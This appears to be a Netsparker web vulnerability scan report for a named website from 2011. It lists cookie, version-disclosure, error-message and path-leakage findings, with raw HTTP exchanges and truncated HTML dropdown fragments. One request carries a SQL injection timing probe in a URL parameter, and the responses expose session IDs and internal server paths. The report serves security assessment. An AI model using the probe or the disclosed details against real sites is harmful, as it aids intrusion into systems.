value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option 
value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option 
value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option>..
Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly provides an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly. (After this change, JavaScript code will no longer be able to read the cookies.)

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However, this is not a silver bullet and will not by itself protect the system against Cross-site Scripting attacks: an attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Identified Cookie

PHPSESSID

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server discloses the PHP version in use through the HTTP response. This information helps an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at that specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities affecting the version identified. The attacker can also use this information in conjunction with other vulnerabilities in the application or the web server.

- /user.php

/user.php

http://www.lessonofpassion.com/user.php?type=register

Extracted Version

PHP/5.2.11

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option 
value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option>..
Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information that an attacker can use to mount new attacks or to enlarge the attack surface. In rare cases it may also be a clue to an SQL Injection vulnerability; most of the time Netsparker will detect and report that problem separately.

Remedy

Do not display error messages in production environments. Save each error message together with a reference number to backend storage such as a text file or database, then show only that number and a static, user-friendly error message to the user.
- /games_best.php

http://www.lessonofpassion.com/games_best.php?offset=%27;WAITFOR%20DELAY%20%270:0:25%27--&id=3&categ..

Parameters

Parameter Type Value
offset GET ';WAITFOR DELAY '0:0:25'--
id GET 3
category GET 3

Request

GET /games_best.php?offset=%27;WAITFOR%20DELAY%20%270:0:25%27--&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 165
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\';WAITFOR DELAY \'0:0:25\'--,20' at line 1
Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information that an attacker can use to mount new attacks or to enlarge the attack surface. Data such as source code or stack traces may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not display error messages in production environments. Save each error message together with a reference number to backend storage such as a log, text file or database, then show only that number and a static, user-friendly error message to the user.
- /lopsalesforce/

http://www.lessonofpassion.com/lopsalesforce/

Identified Error Message

Request

GET /lopsalesforce/ HTTP/1.1
Referer: http://www.lessonofpassion.com/lopsalesforce/vert_3dac.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 270
Content-Type: text/html


<br /><b>Warning</b>: require_once(render_lop.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br /><br /><b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'render_lop.php' (include_path='.:/usr/local/lib/php') in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br />
[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker during the exploitation of other vulnerabilities.

Remediation

External References

- /lopsalesforce/

http://www.lessonofpassion.com/lopsalesforce/

Identified Internal Path(s)

Request

GET /lopsalesforce/ HTTP/1.1
Referer: http://www.lessonofpassion.com/lopsalesforce/vert_3dac.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 270
Content-Type: text/html


<br /><b>Warning</b>: require_once(render_lop.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br /><br /><b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'render_lop.php' (include_path='.:/usr/local/lib/php') in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br />